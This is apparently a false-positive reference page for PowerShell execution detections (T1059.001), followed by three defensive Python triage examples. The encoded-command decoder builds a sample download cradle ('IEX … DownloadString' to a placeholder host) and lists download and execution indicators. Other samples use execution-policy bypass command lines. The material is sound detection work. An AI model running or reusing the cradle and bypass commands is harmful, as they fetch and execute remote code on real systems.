LoFP / t1059.001

t1059.001

Title
administrative activity
administrative script libraries
administrative scripts that use the same keywords.
administrator script
administrator scripts
administrators may attempt to change the default execution policy on a system for a variety of reasons. however, setting the policy to "unrestricted" or "bypass", which is what this search is designed to identify, would be unusual. hits should be reviewed and investigated as appropriate.
administrators or power users may use this command.
administrators or power users may use this powershell cmdlet for troubleshooting.
amazon ssm document worker
appvclient
benign administrative tasks can also trigger alerts, necessitating a firm understanding of the typical system behavior and precise tuning of the analytic to reduce false positives.
ccm
citrix configsync.ps1
database administrators and developers frequently use invoke-sqlcmd as a legitimate tool for various database management tasks. this includes running automated database maintenance scripts, performing etl (extract, transform, load) processes, executing data migration jobs, implementing database deployment and configuration scripts, and running monitoring and reporting tasks. to effectively manage false positives in your environment, consider implementing several mitigation strategies. first, establish a whitelist of known administrator and service accounts that regularly perform these operations. second, create exceptions for approved script paths where legitimate database operations typically occur. additionally, it's important to baseline your environment's normal powershell database interaction patterns and implement monitoring for any deviations from these established patterns. finally, consider adjusting the risk score thresholds based on your specific environment and security requirements to achieve an optimal balance between security and operational efficiency.
depending on the scripts, this rule might require some initial tuning to fit the environment
direct powershell command execution through sqlps.exe is uncommon; a child process sqlps.exe spawned by sqlagent.exe is a legitimate action.
direct powershell command execution through sqltoolsps.exe is uncommon; a child process sqltoolsps.exe spawned by smss.exe is a legitimate action.
false positives may be present and filtering will need to occur by parent process or command-line argument. it may be necessary to modify this query for an edr product for more granular coverage.
false positives may be present based on legacy applications or utilities. win32_scheduledjob uses the remote procedure call (rpc) protocol to create scheduled tasks on remote computers. it uses the dcom (distributed component object model) infrastructure to establish a connection with the remote computer and invoke the necessary methods. the rpc service needs to be running on both the local and remote computers for the communication to take place.
false positives may be present when an administrator utilizes the cmdlets in the query. filter or monitor as needed.
false positives may be present. tune as needed.
false positives may occur if there are legitimate administrative commands being executed on the crushftp server that match the suspicious patterns. review the commands being executed to determine if the activity is legitimate administrative work or potential malicious activity.
false positives may only pertain to it not being related to empire, but another framework. filter as needed if any applications use the same pattern.
false positives should be limited as day to day scripts do not use this method.
false positives should be limited as the commands being identified are quite specific to eventcode 4104 and mimikatz. filter as needed.
false positives should be limited. filter as needed.
false positives should be very limited as this is strict to metasploit behavior.
false positives should be very unlikely.
false positives will be present if any scripts are adding to inprocserver32. filter as needed.
high
in rare administrative cases, this function might be used to check network connectivity
it is possible administrators or scripts may run these commands, filtering may be required.
it is possible that legitimate scripts or network administrators may enable powershell web access. monitor and escalate as needed.
it is possible there will be false positives, filter as needed.
legitimate administrative script
legitimate applications may spawn powershell as a child process of the identified processes. filter as needed.
legitimate certificate exports by administrators. additional filters might be required.
legitimate commands in .lnk files
legitimate powershell commands that use hidden windows for automation tasks may trigger this detection. the search specifically looks for patterns typical of fakecaptcha campaigns. you may need to add additional exclusions for legitimate administrative activities in your environment by modifying the filter macro.
legitimate powershell web access installations by administrators
legitimate process can have this combination of command-line options, but it's not common.
legitimate scripts that use iex
legitimate usage of dsinternals for administration or audit purpose.
legitimate usage of remote powershell, e.g. for monitoring purposes.
legitimate usage of remote powershell, e.g. remote administration and monitoring.
legitimate use of pester for writing tests for powershell scripts and modules
legitimate use of remote powershell execution
legitimate use of ssh proxycommand with scripting engines may trigger this detection. filter as needed based on your environment's normal ssh usage patterns and authorized scripting activities.
legitimate use of remote powershell sessions
legitimate use of passing a password to different powershell commands
likely
likely. many admin scripts and tools leverage powershell in their bat or vb scripts which may trigger this rule often. it is best to add additional filters or use this to hunt for anomalies
limited false positives may be present. filter as needed based on initial analysis.
limited false positives. filter as needed.
limited false positives. may filter as needed.
microsoft operations manager (mom)
microsoft sccm
moderate-to-low; despite the shorter length/lower entropy for some of these, because of high specificity, fp appears to be fairly limited in many environments.
msp detection searcher
needs tuning of applocker, or exceptions added in the siem
network administrators may use this command for checking purposes
network operators may use this command.
network service user name in a localization not covered by the rule
note that false positives may occur due to the use of the enable-psremoting cmdlet by legitimate users, such as system administrators. it is recommended to apply appropriate filters as needed to minimize the number of false positives.
other programs that use these command-line options and accept an 'all' parameter
other scripts
other tools that incidentally use the same command line parameters
other tools that work with encoded scripts in the command line instead of script files
potential for some third party applications to disable amsi upon invocation. filter as needed.
powershell developers may also use this function in their scripts for instance checking.
powershell may use this function to process compressed data.
powershell may use this function to store output objects in memory.
powershell scripts running as system user
powershell scripts that download content from the internet
programs using powershell directly without invocation of a dedicated interpreter
scripts or tools that download files
software installers that pull packages from remote systems and execute them
some false positives may arise in some environments and this may require some tuning. add additional filters or reduce the level depending on the amount of noise.
some legitimate applications or administrative scripts may use these services for ip validation or geolocation. filter as needed for approved administrative tools.
some legitimate services or custom applications may use non-standard ports for development, remote management, or internal communication. ephemeral ports in test environments may occasionally overlap with ports used in this detection. additional context such as process name, user behavior, or endpoint telemetry should be used to validate suspicious sessions before escalation.
some legitimate user actions may trigger explorer.exe to spawn powershell or cmd.exe, such as right-clicking and selecting "open powershell window here" or similar options. filter as needed based on your environment's normal behavior patterns.
there may be legitimate reasons to bypass the powershell execution policy. the powershell script being run with this parameter should be validated to ensure that it is legitimate.
these characters might be legitimately on the command-line, but it is not common.
this behavior may be noisy, as these cmdlets are commonly used by system administrators or other legitimate users to manage services. therefore, it is recommended not to enable this analytic as a direct finding; instead, it should be used as part of a broader set of security controls to detect and investigate potential threats.
this is meant to be a low risk rba anomaly analytic or to be used for hunting. enable this with a low risk score and let it generate risk in the risk index.
unlikely
use of the get-command and get-help cmdlets to reference invoke-webrequest and start-bitstransfer.
used by microsoft sql server management studio
used by some .net binaries, minimal on user workstation.
valid changes to the startup script
very special / sneaky powershell scripts
windows defender atp
winrm
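The invoke-sqlcmd entry above lists four tuning measures (an allowlist of administrator and service accounts, approved script paths, a baseline of normal database interaction, and an adjustable risk threshold). The following is an added example, not code from the LoFP page or from any detection-content project, of how those measures combine into a scoring layer over PowerShell script-block events (event ID 4104, modelled here by its "Path" and "ScriptBlockText" fields). Every account, host, path, weight and sample event is an assumption constructed for illustration.

```python
# Added example (not from the LoFP page or any detection-content project):
# a tuning layer for Invoke-Sqlcmd alerts that applies an account allowlist,
# approved script paths, a host baseline and a risk threshold to 4104 events.
# All accounts, hosts, paths, weights and sample events are constructed.
import re
from dataclasses import dataclass
from typing import List, Tuple

# Assumed allowlists for a hypothetical environment (lower-case for matching).
ALLOWED_ACCOUNTS = {"corp\\svc-sqlmaint", "corp\\dba-alice"}
APPROVED_SCRIPT_DIRS = ("c:\\sqlops\\maintenance\\", "c:\\sqlops\\etl\\")
# Hypothetical baseline learned from an earlier observation window: which
# hosts each known account normally runs Invoke-Sqlcmd from.
BASELINE = {
    "corp\\svc-sqlmaint": {"sql01", "sql02"},
    "corp\\dba-alice": {"dba-ws01"},
}

INVOKE_SQLCMD = re.compile(r"\binvoke-sqlcmd\b", re.IGNORECASE)
INLINE_QUERY = re.compile(r"-query\b", re.IGNORECASE)


@dataclass
class ScriptBlockEvent:
    host: str
    user: str
    path: str         # 4104 "Path": script file, empty for interactive input
    script_text: str  # 4104 "ScriptBlockText"


def score_event(ev: ScriptBlockEvent, base: int = 50) -> int:
    """Risk score for one event; 0 means the event is suppressed entirely."""
    if not INVOKE_SQLCMD.search(ev.script_text):
        return 0
    score = base
    user = ev.user.lower()
    path = ev.path.lower()
    # Approved script location: the strongest sign of scheduled maintenance.
    if path.startswith(APPROVED_SCRIPT_DIRS):
        score -= 30
    # Known DBA or service account.
    if user in ALLOWED_ACCOUNTS:
        score -= 20
    # Baseline deviation: a known account on a host it has not used before
    # is more interesting than the same account in its usual place; an
    # account with no baseline has no established pattern to compare against.
    if user in BASELINE:
        if ev.host.lower() not in BASELINE[user]:
            score += 25
    else:
        score += 15
    # Ad hoc inline SQL typed at a prompt rather than run from a script file.
    if not path and INLINE_QUERY.search(ev.script_text):
        score += 10
    return max(score, 0)


def triage(events: List[ScriptBlockEvent], threshold: int = 40) -> List[Tuple[ScriptBlockEvent, int]]:
    """Events whose score reaches the (environment-specific) threshold."""
    hits = []
    for ev in events:
        score = score_event(ev)
        if score >= threshold:
            hits.append((ev, score))
    return hits


# Constructed sample events.
SAMPLE_EVENTS = [
    # Scheduled maintenance from an approved path by the service account: suppressed.
    ScriptBlockEvent("SQL01", "CORP\\svc-sqlmaint", "C:\\SqlOps\\Maintenance\\reindex.ps1",
                     "Invoke-Sqlcmd -ServerInstance sql01 -InputFile .\\reindex.sql"),
    # Unknown user running ad hoc SQL from a workstation prompt: high score.
    ScriptBlockEvent("WS-042", "CORP\\jsmith", "",
                     "Invoke-Sqlcmd -ServerInstance sql01 -Query 'SELECT name FROM sys.databases'"),
    # Service account on an unusual host with an unapproved script: medium score.
    ScriptBlockEvent("WS-042", "CORP\\svc-sqlmaint", "C:\\Temp\\dump.ps1",
                     "Invoke-Sqlcmd -Query 'SELECT * FROM hr.salaries' | Export-Csv C:\\Temp\\out.csv"),
    # Unrelated script block: not scored at all.
    ScriptBlockEvent("SQL01", "CORP\\svc-sqlmaint", "",
                     "Get-Service | Where-Object Status -eq 'Running'"),
]

if __name__ == "__main__":
    for ev, score in triage(SAMPLE_EVENTS):
        print(f"{score:3d} {ev.host} {ev.user} {ev.path or '<interactive>'}")
```

The weights are deliberately additive so that one allowlist hit never suppresses an event on its own: the service account on an unfamiliar host still clears the threshold, which is the "monitor deviations from the baseline" point of the entry.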
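Several entries above turn on encoded command lines: tools that pass encoded scripts instead of script files, the note that shorter or lower-entropy payloads still match because of their specificity, and scripts that use iex or download content. The following is an added example, not code from the LoFP page or from any detection-content project, that pulls the -EncodedCommand value out of a command line (including the -e, -ec and -enc forms PowerShell accepts), decodes it from base64 over UTF-16LE, and reports length, entropy and indicator hits so the decoded text rather than the opaque blob is what gets judged. The indicator list and every sample command line are assumptions constructed for illustration.

```python
# Added example (not from the LoFP page or any detection-content project):
# decode PowerShell -EncodedCommand payloads for triage. The indicator list
# and the sample command lines are constructed for illustration.
import base64
import math
import re
from collections import Counter
from typing import Optional

# -EncodedCommand and the abbreviations PowerShell accepts (-e, -ec, -enc).
ENCODED_FLAG = re.compile(
    r"(?:^|\s)-(?:encodedcommand|enc|ec|e)\b\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Hypothetical indicators worth a second look inside a decoded script.
SUSPICIOUS = [
    ("iex", r"\biex\b"),
    ("invoke-expression", r"\binvoke-expression\b"),
    ("downloadstring", r"\bdownloadstring\b"),
    ("downloadfile", r"\bdownloadfile\b"),
    ("net.webclient", r"\bnet\.webclient\b"),
    ("invoke-webrequest", r"\binvoke-webrequest\b"),
    ("start-bitstransfer", r"\bstart-bitstransfer\b"),
    ("frombase64string", r"\bfrombase64string\b"),
]
SUSPICIOUS = [(name, re.compile(rx, re.IGNORECASE)) for name, rx in SUSPICIOUS]


def encode_command(script: str) -> str:
    """Encode a script the way PowerShell expects it for -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def extract_encoded(command_line: str) -> Optional[str]:
    m = ENCODED_FLAG.search(command_line)
    return m.group(1) if m else None


def decode_encoded(blob: str) -> Optional[str]:
    """Base64 -> UTF-16LE; None if the blob is not a valid encoded command."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def shannon_entropy(text: str) -> float:
    """Bits per character; short or repetitive scripts score low."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def analyze(command_line: str) -> dict:
    blob = extract_encoded(command_line)
    if blob is None:
        return {"encoded": False}
    script = decode_encoded(blob)
    if script is None:
        return {"encoded": True, "decoded": None, "verdict": "undecodable"}
    hits = [name for name, rx in SUSPICIOUS if rx.search(script)]
    return {
        "encoded": True,
        "decoded": script,
        "length": len(script),
        "entropy": round(shannon_entropy(script), 2),
        "indicators": hits,
        # Low length or entropy alone does not clear an encoded command;
        # the decoded content decides.
        "verdict": "suspicious" if hits else "review",
    }


# Constructed sample command lines (the cradle host uses a reserved name).
BENIGN = "powershell.exe -NoProfile -EncodedCommand " + encode_command("Get-Date")
CRADLE = "powershell.exe -nop -w hidden -enc " + encode_command(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')")
BROKEN = "powershell.exe -e abc"
PLAIN = "powershell.exe -File C:\\Scripts\\inventory.ps1"

if __name__ == "__main__":
    for line in (BENIGN, CRADLE, BROKEN, PLAIN):
        print(analyze(line))
```

A practitioner would key the exception list on the decoded text (for example, the exact script a packaging tool emits) rather than on the base64 string, which changes with every whitespace difference.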
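Several entries above describe the same triage steps for PowerShell process-creation events: suppress known-good parent/child pairs (sqlps.exe under sqlagent.exe and sqltoolsps.exe under smss.exe, as listed above), suppress the interactive "open powershell window here" launch from explorer.exe, treat powershell spawned from bat or vb scripts as worth a look, and, for execution-policy bypasses, validate the script that is actually being run. The following is an added example, not code from the LoFP page or from any detection-content project, that applies those filters in one pass and returns the script path alongside the verdict. The Explorer command-line pattern, the scripting-host list, the approved directory and every sample event are assumptions constructed for illustration; the known-good pairs are taken from the entries above and should be checked against your own telemetry.

```python
# Added example (not from the LoFP page or any detection-content project):
# triage of PowerShell process-creation events with parent/child suppression,
# execution-policy detection and script-path extraction. Pairs are those the
# entries above list; everything else is constructed for illustration.
import re
from dataclasses import dataclass, field
from typing import List

KNOWN_GOOD_PAIRS = {("sqlagent.exe", "sqlps.exe"), ("smss.exe", "sqltoolsps.exe")}
SCRIPTING_HOSTS = {"cmd.exe", "wscript.exe", "cscript.exe"}
APPROVED_SCRIPT_DIRS = ("c:\\ops\\scripts\\",)

# Assumed shape of the "Open PowerShell window here" launch from Explorer.
EXPLORER_SHELL_HERE = re.compile(r"-noexit\s+-command\s+set-location\b", re.IGNORECASE)
# -ExecutionPolicy and its prefixes (-ex, -exec, ...) plus -ep, with a lax value.
POLICY_ARG = re.compile(r"-(?:ep|ex[a-z]*)\s+(bypass|unrestricted)\b", re.IGNORECASE)
SET_POLICY = re.compile(
    r"\bset-executionpolicy\s+(?:-executionpolicy\s+)?(bypass|unrestricted)\b", re.IGNORECASE)
FILE_ARG = re.compile(r"-f(?:ile)?\s+\"?([^\"\s]+\.ps1)", re.IGNORECASE)


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


@dataclass
class Verdict:
    action: str  # "suppress", "ignore", "low" or "review"
    reasons: List[str] = field(default_factory=list)
    script_path: str = ""


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def triage(ev: ProcEvent) -> Verdict:
    parent, child, cmd = _basename(ev.parent_image), _basename(ev.image), ev.command_line
    if (parent, child) in KNOWN_GOOD_PAIRS:
        return Verdict("suppress", ["known-good parent/child pair"])
    if parent == "explorer.exe" and EXPLORER_SHELL_HERE.search(cmd):
        return Verdict("suppress", ["interactive shell opened from Explorer"])
    reasons = []
    m = POLICY_ARG.search(cmd) or SET_POLICY.search(cmd)
    if m:
        reasons.append("execution policy " + m.group(1).lower())
    if parent in SCRIPTING_HOSTS:
        reasons.append("spawned by scripting host " + parent)
    f = FILE_ARG.search(cmd)
    script = f.group(1) if f else ""
    if reasons and script.lower().startswith(APPROVED_SCRIPT_DIRS):
        # An approved location lowers priority, but the script is still
        # reported so it can be validated, as the entries above ask.
        return Verdict("low", reasons + ["approved script path"], script)
    return Verdict("review" if reasons else "ignore", reasons, script)


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample events.
SAMPLES = [
    ProcEvent(r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\SQLAGENT.EXE",
              r"C:\Program Files\Microsoft SQL Server\Tools\Binn\SQLPS.exe",
              r'"SQLPS.exe" -Command "& {Invoke-Sqlcmd -Query $env:JOB_QUERY}"'),
    ProcEvent(r"C:\Windows\explorer.exe", PS,
              r"powershell.exe -noexit -command Set-Location -literalPath 'C:\Users\alice\Documents'"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", PS,
              r"powershell.exe -ep bypass -f C:\Ops\Scripts\backup.ps1"),
    ProcEvent(r"C:\Windows\System32\wscript.exe", PS,
              r"powershell.exe -nop -w hidden -ExecutionPolicy Bypass -File C:\Users\Public\update.ps1"),
    ProcEvent(PS, PS,
              r"powershell.exe -Command Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope LocalMachine"),
    ProcEvent(r"C:\Windows\explorer.exe", PS, "powershell.exe"),
]

if __name__ == "__main__":
    for ev in SAMPLES:
        v = triage(ev)
        print(f"{v.action:8s} {_basename(ev.parent_image)} -> {_basename(ev.image)} {v.reasons} {v.script_path}")
```

Suppression is keyed on the parent/child pair and the exact interactive command-line shape, not on the child image alone, so a powershell.exe that Explorer spawns with a hidden window or an execution-policy argument still reaches review.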